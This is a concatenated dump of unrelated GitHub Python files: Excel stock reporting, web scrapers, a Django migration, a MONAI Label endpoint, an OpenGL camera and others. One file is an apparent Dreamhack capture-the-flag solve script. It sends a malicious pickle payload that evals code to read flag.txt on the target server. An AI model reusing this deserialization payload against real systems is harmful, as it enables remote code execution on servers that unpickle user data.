rows = [('SKU', '{}'.format(current_sku_id)), ('Fecha', 'Cantidad')]
# rows = rows
# rows = rows.extend([('Fechas', 'Cantidad')])
rows.extend(vals)
row_counter = 0
max_value = max(values)
min_value = min(values)
for row in rows:
# ws_raw.append(row)
cell1 = ws_raw.cell(row=1+row_counter,column=1 + counter*4)
cell2 = ws_raw.cell(row=1+row_counter, column=2 + + counter*4)
# ws_raw.cell(row=1+row_counter,column=1 + counter*4).value = row[0]
cell1.value = row[0]
cell1.font = Font(bold=True, )
cell1.border = thin_border
cell1.alignment = Alignment(horizontal='left')
# ws_raw.cell(row=1+row_counter, column=2 + + counter*4).value = row[1]
cell2.value = row[1]
cell2.font = Font(bold=True, )
cell2.border = thin_border
cell2.alignment = Alignment(horizontal='left')
row_counter+=1
chart1 = BarChart()
chart1.type = "col"
chart1.style = 10
# chart1.title = "Status del SKU: {0}\n{1}".format(current_sku_id,current_sku_name) #Nombre con salto de línea
chart1.title = "Proyecciones para el SKU: {0}, {1}".format(current_sku_id, current_sku_name) #Nombre con flecha
chart1.y_axis.title = 'Cantidad'
chart1.x_axis.title = 'Fecha'
# data = Reference(ws, min_col=2, min_row=1, max_row=7, max_col=3)
data = Reference(ws_raw, min_col=2+ counter*4, min_row=2, max_row=len(rows))
cats = Reference(ws_raw, min_col=1+ counter*4, min_row=3, max_row=len(rows))
chart1.legend = None
chart1.add_data(data, titles_from_data=True)
chart1.set_categories(cats)
chart1.shape = 4
chart1.width = 100
chart1.y_axis.scaling.min = -200# 200 ES UN BUEN VALOR PARA EL DISPLAY FIJO
chart1.y_axis.scaling.min = min_value - 50 # VALOR MINIMO EN EL GRÁFICO
chart1.y_axis.scaling.max = 500# 500 ES UN BUEN VALOR PARA EL DISPLAY FIJO
chart1.y_axis.scaling.max = max_value + 50 # VALOR MAXIMO EN EL GRÁFICO
# set a pattern for the whole series
fill = PatternFillProperties(prst="ltUpDiag")
fill.foreground = ColorChoice(prstClr="blue")
fill.background = ColorChoice(prstClr="blue")
# pat = PatternFill("solid", fgColor="ffff00")
series = chart1.series[0]
series.graphicalProperties.pattFill = fill
#Obtener los índices de las alarmas
alarm_indexes = []
for i in range(0,len(values)):
if values[i] <= current_sku_critical_level:
alarm_indexes.append(i)
# Pintar de rojo las barras críticas
for alarm_index in alarm_indexes:
pt = DataPoint(idx=alarm_index)
alarm_fill = PatternFillProperties(prst="ltUpDiag")
alarm_fill.foreground = ColorChoice(prstClr="red")
alarm_fill.background = ColorChoice(prstClr="red")
pt.graphicalProperties.pattFill = alarm_fill
series.dPt.append(pt)
row_counter = 0
for alarm_index in alarm_indexes:
cell1 = ws_raw.cell(row=1 + alarm_index +2, column=1 + counter * 4)
cell2 = ws_raw.cell(row=1 + alarm_index +2, column=2 + + counter * 4)
cell1.font = Font(bold=True)
cell1.border = thin_border
cell1.alignment = Alignment(horizontal='left')
cell2.fill = PatternFill("solid", fgColor="ff0000")
cell2.font = Font(bold=True)
cell2.border = thin_border
cell2.alignment = Alignment(horizontal='left')
cell2.fill = PatternFill("solid", fgColor="ff0000")
# if(len(alarm_indexes)>0): #Si hay algún día bajo el nivel crítico
if (values[0] <= current_sku_critical_level): # Si hoy el nivel está crítico
cell3 = ws_raw.cell(row=1, column=1 + counter * 4 + 2)
cell3.value = "COMPRAR"
cell3.font = Font(bold=True)
cell3.border = thin_border
cell3.alignment = Alignment(horizontal='left')
cell3.fill = PatternFill("solid", fgColor="ff0000")
wrap_alignment = Alignment(wrap_text=True, horizontal="center",
vertical="center")
cell3.alignment = wrap_alignment
row_counter += 1
ws_plotted.add_chart(chart1, "{0}{1}".format("A",10 + counter*18))
counter+=1
# # Escribir la fecha en la que fue producida el reporte:
# ws_plotted.column_dimensions["C"].width = 20
# cell = ws_plotted.cell(row=3, column=3, value="Reporte producido el: ")
# cell.font = Font(bold=True, )
# cell.border = thin_border
# cell.alignment = Alignment(horizontal='left')
#
# cell = ws_plotted.cell(row=3, column=4, value=date.today())
# cell.font = Font(bold=True, )
# cell.border = thin_border
# cell.alignment = Alignment(horizontal='left')
try:
module_path = os.path.dirname(__file__)
panorama_folder_path = os.path.abspath(os.path.join(module_path, os.pardir))
report_folder_path = os.path.join(panorama_folder_path, "Reportes")
if not os.path.exists(report_folder_path):
os.makedirs(report_folder_path)
report_file_name = "Informe de Stock {}.xlsx".format(date.today())
fn = os.path.join(report_folder_path, report_file_name)
wb.save(fn)
except OSError as e:
if e.args[0] != 13:
raise
input("\n Ha ocurrido un error porque el archivo Informe de Stock.xlsx está abierto. Por favor ciérrelo y presione cualquier tecla para que el programa pueda continuar.")
from database import db
# createStockReport(db)
| [
"gaperez2@uc.cl"
] | gaperez2@uc.cl |
316dab7a9254a7b5775eafa39e9a5a3d89a2fa74 | d69b7f878bdbb9e278a63c7bb6f99e974cd57a80 | /2.Advanced/23.Advanced_Python_Python_Generators_in_Simple_Way_by_Durga_On_20-09-2018_5.py | 4d083411260bcf4dd0451b4339e943501d0ca7d3 | [] | no_license | rexelit58/python | cf8e1faf9441d720036814cef0134a3388d3d4f5 | dfadecf2183f4b6fe6f3c6ae38cd2f03301a2735 | refs/heads/master | 2023-06-26T14:54:40.078073 | 2021-07-18T13:54:46 | 2021-07-18T13:54:46 | 387,185,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | def fib():
a,b=0,1
while True:
yield a
a,b=b,a+b
for n in fib():
if n>100:
break
print(n) | [
"kaviyarasan.a@infinitisoftware.net"
] | kaviyarasan.a@infinitisoftware.net |
4f27d80585a6cc4ed6fa8b0abb2437eaf6559a6f | 994b6c4dfd6a0f78a81f87235e3c6972db3f2142 | /main.py | dfbc12a5f9abf73452a06ad3fa3c240e0556f91b | [] | no_license | dengjiaxing/Scrapy-WindowsAPI- | d0cede10a7ca9e6b760895e85de22ace72ed257e | 4a92cc378d3cccb46404cff250f06f7afcb720c2 | refs/heads/master | 2021-01-22T22:35:16.665330 | 2017-03-20T09:23:58 | 2017-03-20T09:23:58 | 85,557,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | #-*- coding: utf-8 -*-
import scrapy.cmdline as cmd
cmd.execute('scrapy crawl api'.split())
| [
"jiaxing@nfs.iscas.ac.cn"
] | jiaxing@nfs.iscas.ac.cn |
0de6164a579340619a967feedf9cae55abad520b | 84bd24e7aba23c7775f52d51c754f14601e28b61 | /property/migrations/0044_propertybooking.py | 20c06999c6842c6b8258f87396995344f74c9908 | [] | no_license | hamzaumar8/sandvet | c0ad473e8f2f97d1c5bf5104e034e731ac0a0add | 7f02d24f1b50cd4f64beff618b6d9c508b7a42d4 | refs/heads/master | 2023-02-18T01:28:25.252360 | 2021-01-18T19:26:39 | 2021-01-18T19:26:39 | 310,844,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 927 | py | # Generated by Django 3.0.6 on 2021-01-04 11:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0007_booking'),
('property', '0043_hotelimage_hotelroomimage'),
]
operations = [
migrations.CreateModel(
name='PropertyBooking',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('booking', models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='propertybooking', to='core.Booking')),
('property', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='bookproperty', to='property.Property')),
],
),
]
| [
"humar6078@gmail.com"
] | humar6078@gmail.com |
7e4f7dc89e2d0ddffe361240627a76cb48bdea6f | fa6e1299ef52ca2d4a13b3788d2a4d0540728f81 | /monailabel/endpoints/batch_infer.py | 09460c5d37ca8b8d759cba1949837a1bc4eceadb | [
"Apache-2.0"
] | permissive | Project-MONAI/MONAILabel | c3abd164255a50279fc5aa6a87f4336fff4d6833 | c90f42c0730554e3a05af93645ae84ccdcb5e14b | refs/heads/main | 2023-09-01T21:44:42.465238 | 2023-08-31T17:17:08 | 2023-08-31T17:17:08 | 351,826,770 | 448 | 167 | Apache-2.0 | 2023-09-14T12:06:28 | 2021-03-26T15:25:10 | Python | UTF-8 | Python | false | false | 3,049 | py | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Optional
import torch
from fastapi import APIRouter, Depends, HTTPException
from monailabel.config import RBAC_ADMIN, RBAC_USER, settings
from monailabel.endpoints.user.auth import RBAC, User
from monailabel.interfaces.datastore import DefaultLabelTag
from monailabel.interfaces.tasks.batch_infer import BatchInferImageType
from monailabel.utils.async_tasks.task import AsyncTask
logger = logging.getLogger(__name__)
router = APIRouter(
prefix="/batch",
tags=["Infer"],
responses={404: {"description": "Not found"}},
)
def status(all: bool = False, check_if_running: bool = False):
res, detail = AsyncTask.status("batch_infer", all, check_if_running)
if res is None:
raise HTTPException(status_code=404, detail=detail)
return res
def run(
model: str,
images: Optional[BatchInferImageType] = BatchInferImageType.IMAGES_ALL,
params: Optional[dict] = None,
run_sync: Optional[bool] = False,
):
request = {"model": model, "images": images}
res, detail = AsyncTask.run("batch_infer", request=request, params=params, force_sync=run_sync)
if res is None:
raise HTTPException(status_code=429, detail=detail)
return res
def stop():
res = AsyncTask.stop("batch_infer")
# Try to clear cuda cache
if torch.cuda.is_available():
torch.cuda.empty_cache()
return res
@router.get("/infer", summary=f"{RBAC_USER}Get Status of Batch Inference Task")
async def api_status(
all: bool = False,
check_if_running: bool = False,
user: User = Depends(RBAC(settings.MONAI_LABEL_AUTH_ROLE_USER)),
):
return status(all, check_if_running)
@router.post("/infer/{model}", summary=f"{RBAC_ADMIN}Run Batch Inference Task")
async def api_run(
model: str,
images: Optional[BatchInferImageType] = BatchInferImageType.IMAGES_ALL,
params: Optional[dict] = {
"device": "cuda",
"multi_gpu": True,
"gpus": "all",
"logging": "WARNING",
"save_label": True,
"label_tag": DefaultLabelTag.ORIGINAL,
"max_workers": 1,
"max_batch_size": 0,
},
run_sync: Optional[bool] = False,
user: User = Depends(RBAC(settings.MONAI_LABEL_AUTH_ROLE_ADMIN)),
):
return run(model, images, params, run_sync)
@router.delete("/infer", summary=f"{RBAC_ADMIN}Stop Batch Inference Task")
async def api_stop(user: User = Depends(RBAC(settings.MONAI_LABEL_AUTH_ROLE_ADMIN))):
return stop()
| [
"noreply@github.com"
] | Project-MONAI.noreply@github.com |
13622a6dd22539e66141720c7144c2e1a23fc69f | a5ba6fc441a8d53dfb5218ef0ef3c6c30b0591e2 | /Dreamhack/web-deserialize-python/solve.py | cd8b34f022d73db6080e298127b4670b15c61b6f | [] | no_license | heogi/CTF-Writeups | a6332dea0af5b3d5e0697d47569d1331332d1ec5 | f6f55f359a443ce1af4553820e340ae774bfb4fd | refs/heads/master | 2021-09-29T18:02:50.485804 | 2021-09-25T03:23:07 | 2021-09-25T03:23:07 | 162,892,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | import requests
import base64
import pickle
import os
url = "http://host1.dreamhack.games:8248/check_session"
info = {"name":123}
FLAG="123"
class exploit(object):
def __reduce__(self):
return (eval,("{'name':open('flag.txt').read()}",))
#return (eval,('open("./flag.txt","r").read()',))
def ex():
#exp = {"name":exploit(),"userid":"123","password":"123"}
#exp = exploit()
exp = base64.b64encode(pickle.dumps(exploit())).decode('utf8')
print(exp)
#print(pickle.loads(base64.b64decode(exp)))
data = {'session': exp}
r = requests.post(url=url,data=data)
print(r.text)
if __name__ == '__main__':
ex()
| [
"noreply@github.com"
] | heogi.noreply@github.com |
864640da95a3bf3b599769c90db530fa7453696e | b0675ed261ff01fe050e8bacd05e692851e087b8 | /no1/02_tieba_spider.py | b54e288b011d1558c2e7772a605dd051afb8487f | [] | no_license | likunhong01/SpiderStudy | dafd6df0525f7ffa5c855c5213710c3bc37dc709 | 78288d3429e7ed2ae175c0009f6c5c85b408c436 | refs/heads/master | 2020-05-09T12:38:15.065593 | 2019-04-28T09:12:18 | 2019-04-28T09:12:18 | 181,118,325 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,694 | py | #coding=utf-8
#Version:python3.6.0
#Tools:Pycharm 2017.3.2
# Author:LIKUNHONG
__date__ = '2019/4/12 19:36'
__author__ = 'likunkun'
import requests
class TiebaSpider:
def __init__(self,tieba_name):
self.tieba_name = tieba_name
self.url_temp = 'https://tieba.baidu.com/f?kw=' + tieba_name+ '&ie=utf-8&pn={}'
self.headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.6784.400 QQBrowser/10.3.2667.400'}
def get_url_list(self): # 构造url列表,把贴吧的每一页都爬取
# url_list = []
# for i in range(1000):
# url_list.append(self.url_temp.format(i*50))
# return url_list
return [self.url_temp.format(i * 50) for i in range(1000)]
def parse_url(self, url): # 发送请求,获取响应
print(url)
response = requests.get(url=url,headers=self.headers)
return response.content.decode()
def save_html(self, html_str, page_num): # 保存html字符串
file_path = '{}-第{}页.html'.format(self.tieba_name, page_num)
with open(file_path,'w',encoding='utf-8') as f: # 黑洞-第1页.html
f.write(html_str)
def run(self): # 实现主要逻辑
# 构造url列表
url_list = self.get_url_list()
# 遍历,发送请求,获取相应
for url in url_list:
html_str = self.parse_url(url)
# 保存数据
page_num = url_list.index(url) + 1 # 页码数
self.save_html(html_str, page_num)
if __name__ == '__main__':
tieba_spider = TiebaSpider('黑洞')
tieba_spider.run() | [
"42308753+likunhong01@users.noreply.github.com"
] | 42308753+likunhong01@users.noreply.github.com |
886ceeab2d5a622b7a03f7dddf725706fde63620 | 168cbb8a8c3e7287779075a319c27a357cb12ad4 | /Sql/baza_sql.py | 0be5e7a18f551be7255b887db2139ee4ce0f0a96 | [] | no_license | kaacpper/gittest | d17092e8d6de61729399026dce4a4615d44cd3dc | 4840fdaf7e7773d4e0dc0da415e53e96f1aeca23 | refs/heads/master | 2021-01-20T15:07:08.644546 | 2018-03-09T17:44:41 | 2018-03-09T17:44:41 | 82,795,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,111 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# baza_sql.py
import sqlite3
from dane import * # import funkcji z pliku dane.py
def main(args):
con = sqlite3.connect('pracownicy.sqlite3')
cur = con.cursor() #utworzenie kursora, chodzi sobie po bazie danych
#utworzenie tabel w bazie danych
with open('pracownicy_z1.sql','r') as plik:
skrypt = plik.read()
cur.executescript(skrypt)
premia = dane_z_pliku('premia.txt')
premia = wyczysc_dane(premia, 1)
dzial = dane_z_pliku('dział.txt')
pracownicy = dane_z_pliku('pracownicy.txt')
pracownicy = wyczysc_dane(pracownicy, 5)
print(pracownicy[0])
cur.executemany('INSERT INTO premia VALUES (?, ?)', premia)
cur.executemany('INSERT INTO dzial VALUES (?, ?, ?)', dzial)
cur.executemany('INSERT INTO pracownicy (id, nazwisko, imie, stanowisko, data_zatrudnienia, placa, id_dzial) VALUES (?, ?, ?, ?, ?, ?, ?)', pracownicy)
con.commit() # zatwierdzenie operacji na bazie
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
| [
"kl3ag1@komp12.lo1cg.org"
] | kl3ag1@komp12.lo1cg.org |
9881d546e5b1b67fd92bcc5ce63e178f0961fbc8 | b352b043ed9db9e53767fe51d1238e376fc53b09 | /data-py/getArtisanData.py | c04256111e0650e6b1ca2300fae10123b63e93db | [] | no_license | AmritM18/stardew-valley-api | 8799582c352212e297f7cfebdf144f702a75103a | 0b25869848a605d1925435f75625599662d6ce2b | refs/heads/master | 2023-02-12T15:41:46.847506 | 2021-01-13T19:41:05 | 2021-01-13T19:41:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,037 | py | import requests
from bs4 import BeautifulSoup
import pandas as pd
def getBeeHouseData(req, indices):
clip = req.split("id=\"Bee_House\"")
clip = clip[1]
soup = BeautifulSoup(clip,'lxml')
table = soup.findAll('table',{'class':'wikitable'})
# looking at all of the tables except for the last 3 (geodes, collection, history)
rows = table[1].findChildren('tr', recursive=False)
tds = tds = rows[1].findChildren('td', recursive=False)
honey = [tds[x].text.strip(' ').strip('\n').replace('\xa0', '') for x in indices]
honey[3] = honey[3] + ': ' + tds[7].text.strip().replace('\xa0', '')
honey.append('Bee House')
for i in range(2, len(rows)):
tds = rows[i].findChildren('td', recursive=False)
if len(tds) == 3: honey[3] = honey[3] + ', ' + tds[1].text.strip() + ': ' + tds[2].text.strip()
elif len(tds) == 2: honey[3] = honey[3] + ', ' + tds[0].text.strip() + ': ' + tds[1].text.strip()
return honey
def getCaskData(req, indices):
clip = req.split("id=\"Cask\"")
clip = clip[1]
soup = BeautifulSoup(clip,'lxml')
table = soup.findAll('table',{'class':'wikitable'})
caskData = []
rows = table[1].findChildren('tr', recursive=False)
for i in range(1, len(rows)):
tds = rows[i].findChildren('td', recursive=False)
cask = [tds[x].text.strip().replace('\xa0', '') for x in indices] # only gives us name and recipe
# now process the Time and Sell tds[3] -- tds[6]
cask.append('0 Days')
cask.append(tds[3].text.strip())
cask[2] = cask[2] + ', ' + tds[4].text[(tds[4].text.rfind(':'))+2:].strip() + ' (Silver)'
cask[3] = cask[3] + ', ' + tds[4].text[:tds[4].text.rfind('Aged')].strip() + ' (Silver)'
cask[2] = cask[2] + ', ' + tds[5].text[(tds[5].text.rfind(':'))+2:].strip() + ' (Gold)'
cask[3] = cask[3] + ', ' + tds[5].text[:tds[5].text.rfind('Aged')].strip() + ' (Gold)'
cask[2] = cask[2] + ', ' + tds[6].text[(tds[6].text.rfind(':'))+2:].strip() + ' (Iridium)'
cask[3] = cask[3] + ', ' + tds[6].text[:tds[6].text.rfind('Aged')].strip() + ' (Iridium)'
cask.append('Cask')
caskData.append(cask)
return caskData
# This requires the oil to have only 2 rows
def getOilMakerData(req, indices):
clip = req.split("id=\"Oil_Maker\"")
clip = clip[1]
soup = BeautifulSoup(clip,'lxml')
table = soup.findAll('table',{'class':'wikitable'})
data = []
rows = table[1].findChildren('tr', recursive=False)
tds = rows[1].findChildren('td', recursive=False)
oil = [tds[x].text.strip().replace('\xa0', '') for x in indices]
oil.append('Oiler Maker')
data.append(oil)
tds = rows[2].findChildren('td', recursive=False)
oil = [tds[x].text.strip().replace('\xa0', '') for x in indices]
oil.append('Oiler Maker')
for i in range(3, 5):
tds = rows[i].findChildren('td', recursive=False)
oil[1] = oil[1] + ', ' + tds[0].text.strip()
oil[2] = oil[2] + ', ' + tds[1].text.strip()
data.append(oil)
return data
def getArtisanData(name, req, indices):
clip = req.split("id=\"" + name.replace(' ', '_') + "\"")
clip = clip[1]
soup = BeautifulSoup(clip,'lxml')
table = soup.findAll('table',{'class':'wikitable'})
data = []
rows = table[1].findChildren('tr', recursive=False)
for i in range(1, len(rows)):
tds = rows[i].findChildren('td', recursive=False)
item = [tds[x].text.strip().replace('\xa0', '') for x in indices]
item.append(name)
if name == "Mayonnaise Machine" or name == "Cheese Press":
item[3] = item[3].replace(' ', '').replace('\n', '').replace('g', 'g, ', 1)
data.append(item)
return data
def main():
# Artisan goods found here: https://stardewvalleywiki.com/Artisan_Goods
# By default, each category has 5 columns unless otherwise stated
# Bee House
# Cask
# Cheese Press
# Keg
# Loom
# Mayonnaise Machine
# Oil Maker
# Preserves Jar
site = "https://stardewvalleywiki.com/Artisan_Goods"
req = requests.get(site).text
columns = ['Name', 'Recipe', 'Time', 'Sell', 'Equipment']
indices = [1, 3, 4, 5]
df = pd.DataFrame(columns=columns)
# Honey
beeHouseIndices = [1, 2, 4, 6]
honey = getBeeHouseData(req, beeHouseIndices)
df = df.append(pd.Series(honey, index=columns), ignore_index=True)
# Cask Data
caskIndices = [1, 2] # time and sell need to be determined from columns 3,4,5,6
caskData = getCaskData(req, caskIndices)
for item in caskData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Cheese Press
name = "Cheese Press"
pressData = getArtisanData(name, req, indices)
for item in pressData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Keg
name = "Keg"
kegData = getArtisanData(name, req, indices)
for item in kegData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Loom
name = "Loom"
loomData = getArtisanData(name, req, indices)
for item in loomData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Mayonnaise Machine
name = "Mayonnaise Machine"
mayonnaiseMachineData = getArtisanData(name, req, indices)
for item in mayonnaiseMachineData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Oil Maker
oilMakerData = getOilMakerData(req, indices)
for item in oilMakerData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
# Preserves Jar
name = "Preserves Jar"
preservesJarData = getArtisanData(name, req, indices)
for item in preservesJarData:
df = df.append(pd.Series(item, index=columns), ignore_index=True)
df.to_csv("/home/amrit/projects/ArtisanData.csv", index=False, encoding='utf-8')
if __name__ == "__main__":
main() | [
"32170897+emilyanas2323@users.noreply.github.com"
] | 32170897+emilyanas2323@users.noreply.github.com |
6a55a58c4b69fce67e16280d94199e88f4af5fca | ea37f2269a796143cf0b1ce2131c425c95e3a954 | /CentralMeasurePosition.py | f7e0b24acf72363272db6c1016f29fec783a6a68 | [] | no_license | paepe/GitBegginers | 886896225f84d03495b53cb96facfc65ac7c562b | 382ac2b913cab7dc24c28379c950f9416cb51dfa | refs/heads/master | 2023-03-29T11:18:20.252793 | 2020-05-23T12:09:09 | 2020-05-23T12:09:09 | 261,003,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | import np
import statistics
from fractions import Fraction as F
from decimal import Decimal as D
# Onde está o erro de np
# np.random.choice(a = [0, 1], size = 50, replace = True, p = [0.5, 0.5, 0.2])
# Calcular a Mediana
x = statistics.median([22, 10, 12, 14, 13, 15])
print(x)
| [
"paulo.peres2014@gmail.com"
] | paulo.peres2014@gmail.com |
419cacd72654319780930be944c1ee242808127b | 28737541ba548ec968750190a1773a427a443664 | /Screen_Shots/Element_Ssreen_Shot.py | 073c8a38df42a5459f87ab9887abe84feaec212a | [] | no_license | Rajeevsinghania15/GitTest1 | 9c18650a544eb02b98ad2a726f854f99be00e3a5 | 9736093d2f8774c368e615b48b60378262b7968e | refs/heads/master | 2020-04-09T09:37:49.218027 | 2018-12-03T19:41:01 | 2018-12-03T19:41:01 | 160,240,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | from selenium import webdriver
import time
from PIL import Image
driver = webdriver.Chrome()
driver.maximize_window()
driver.get("https://demo.actitime.com/login.do")
driver.implicitly_wait(30)
ele = driver.find_element_by_id("loginButton")
driver.save_screenshot("Sample.png")
img = Image.open("Sample.png")
loc = ele.location
size = ele.size
left = loc["x"]
top = loc['y']
right = loc["x"] + size['width']
bottom = loc['y'] + size['height']
img = img.crop((left,top,right,bottom))
img.save('Cropping.png')
time.sleep(5)
driver.close() | [
"Manoj Rajeev@DESKTOP-IG87LFQ"
] | Manoj Rajeev@DESKTOP-IG87LFQ |
498f444e9944af0709395bdbffcaeedc770d6ed7 | 07330c446d2efc7966d4e98e3ae19a33314fed22 | /python_choice_models/estimation/market_explore/__init__.py | a21b25cfd3303afc35e686e5f57c9e8c309d580b | [] | no_license | DRL-OM/choice-models | f4d26a771ee0ab2988a112a6a84b388764275a66 | 90b1f1c7160672fdf8b5689fbf5480e29576bf01 | refs/heads/master | 2023-03-26T01:33:40.160397 | 2021-03-25T14:18:47 | 2021-03-25T14:18:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343 | py | # This code is from the paper:
# Berbeglia, G., Garassino, A., & Vulcano, G. (2018). A comparative empirical study of discrete choice models in retail operations. Available at SSRN 3136816.
class MarketExplorer(object):
def explore_for(self, estimator, model, transactions):
raise NotImplementedError('Subclass responsibility')
| [
"ajgarassino@gmail.com"
] | ajgarassino@gmail.com |
41d4e71f3e2a6c62792fb61263f2cdbb41a99d1d | 8f6aa9ac9c8c2e409875bbf36fbc49b3eb37d88b | /enthought/block_canvas/context/api.py | 0276b7ff919b2cbbf3ae5be3f8dfde407fb57b44 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | enthought/etsproxy | 5660cf562c810db2ceb6b592b6c12274bce96d73 | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | refs/heads/master | 2023-03-27T04:51:29.297305 | 2020-12-02T09:05:18 | 2020-12-02T09:05:18 | 1,632,969 | 3 | 1 | NOASSERTION | 2020-12-02T09:05:20 | 2011-04-18T22:29:56 | Python | UTF-8 | Python | false | false | 92 | py | # proxy module
from __future__ import absolute_import
from blockcanvas.context.api import *
| [
"ischnell@enthought.com"
] | ischnell@enthought.com |
e5aea76cc15e3bf47cf1e7969a74795b665ae48f | 943d0787140ee5bb09ffee6740d805426c9cbd01 | /Problem14-EstimatePi.py | deae90714cb278a3ba67ff3a5586a7042e0e47af | [] | no_license | pengnam/DailyCodingProblemSolutions | 20d30bd1387a605e097fc93474725f1014fbc6c3 | 625a206d67336e705901c685ac1d9cae647d0ac6 | refs/heads/master | 2020-04-25T13:47:13.309877 | 2019-05-07T16:21:46 | 2019-05-07T16:21:46 | 172,819,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | """
The area of a circle is defined as (pi)*r^2. Estimate pi to 3 decimal places using a Monte Carlo method.
"""
import random
#I will approximate give r = 1. I will try within x = [0,1], y=[0,1], and check if point in circle (1/4 of a circle)
def solution():
rounds = 10000000
count = 0
for _ in range(rounds):
x = random.random()
y = random.random()
if (x**2 + y**2) <= 1:
count += 1
print(count)
return ((float(count))/rounds) * 4
print(solution())
| [
"seanngpengnam@gmail.com"
] | seanngpengnam@gmail.com |
bbdd48a6ccdb523dcc383c57275638331914fd6c | 57320faf6dc6fb5cf4ad896c11a6aedf22be6ddb | /pyplex/camera.py | 40c01e6911d808a46f37945ddd4874a846d605c6 | [
"MIT"
] | permissive | pyplex/pyplex | ed183d11c27339a1a857a11b34a10f541a53ea44 | 66e19acb3efd1a8a69d28022edcb0b6ad5cb6b11 | refs/heads/master | 2021-01-25T11:39:33.853304 | 2018-06-06T11:47:37 | 2018-06-06T11:47:37 | 117,576,175 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,910 | py | from pyplex import gl
from pyplex.abstract import UniformObject
from pyplex.glow.buffer import UniformBuffer
from pyplex.transform import *
import numpy as np
from math import sin, cos
class Camera(UniformObject):
def __init__(self, ctx: gl.GL_ANY, projection: np.matrix, view: np.matrix):
self._projection = projection
self._view = view
self._position = invert(view)[3, :3]
buffer = np.empty(1, [('projection', '(4,4)f4'), ('view', '(4,4)f4'), ('position', '3f4')])
buffer['projection'] = self._projection
buffer['view'] = self._view
buffer['position'] = self._position
self._buffer = UniformBuffer(ctx, buffer, gl.BufferUsage.STREAM_DRAW)
@property
def buffer(self) -> UniformBuffer:
return self._buffer
@property
def projection(self) -> np.matrix:
return self._projection
@projection.setter
def projection(self, value: np.matrix):
self._projection = np.asmatrix(value)
self._buffer['projection'] = self._projection
@property
def view(self) -> np.matrix:
return self._view
@view.setter
def view(self, value: np.matrix):
self._view = np.asmatrix(value)
self._position = np.asarray(invert(self._view))[3, :3]
self._buffer['view'] = self._view
self._buffer['position'] = self._position
@property
def position(self) -> np.ndarray:
return self._position
class PerspectiveCamera(Camera):
def __init__(self, ctx: gl.GL_ANY, fov: float, aspect: float, near: float, far: float, view: np.matrix):
super().__init__(ctx, perspective(fov, aspect, near, far), view)
self._fov = fov
self._aspect = aspect
self._near = near
self._far = far
@property
def fov(self) -> float:
return self._fov
@fov.setter
def fov(self, value: float):
self._fov = value
self._update_projection()
@property
def aspect(self) -> float:
return self._aspect
@aspect.setter
def aspect(self, value: float):
self._aspect = value
self._update_projection()
@property
def near(self) -> float:
return self._near
@near.setter
def near(self, value: float):
self._near = value
self._update_projection()
@property
def far(self) -> float:
return self._far
@far.setter
def far(self, value: float):
self._far = value
self._update_projection()
def _update_projection(self):
self.projection = perspective(self._fov, self._aspect, self._near, self._far)
class TrackBallCamera(PerspectiveCamera):
def __init__(self, ctx: gl.GL_ANY, fov: float, aspect: float, near: float, far: float,
pivot: np.ndarray, up: np.ndarray, theta: float, phi: float, radius: float):
self._pivot = pivot
self._up = up
self._theta = theta
self._phi = phi
self._radius = radius
self._rotation = np.array([
sin(self._theta) * cos(self._phi),
cos(self._theta),
sin(self._theta) * sin(self._phi)],
np.float32)
self._position = self._pivot + self._radius * self._rotation
super().__init__(ctx, fov, aspect, near, far, look_at(self._position, self._pivot, self._up))
@property
def position(self) -> np.ndarray:
return self._position
@property
def pivot(self) -> np.ndarray:
return self._pivot
@pivot.setter
def pivot(self, value: np.ndarray):
self._pivot = value
self._update_view()
@property
def rotation(self) -> np.ndarray:
return self._rotation
@rotation.setter
def rotation(self, value: np.ndarray):
self._rotation = value
self._update_view()
@property
def up(self) -> np.ndarray:
return self._up
@up.setter
def up(self, value: np.ndarray):
self._up = value
self._update_view()
@property
def theta(self) -> float:
return self._theta
@theta.setter
def theta(self, value: float):
self._theta = value
self._update_view()
@property
def phi(self) -> float:
return self._phi
@phi.setter
def phi(self, value: float):
self._phi = value
self._update_view()
@property
def radius(self) -> float:
return self._radius
@radius.setter
def radius(self, value: float):
self._radius = value
self._update_view()
def _update_view(self):
self._rotation = np.array([
sin(self._theta) * cos(self._phi),
cos(self._theta),
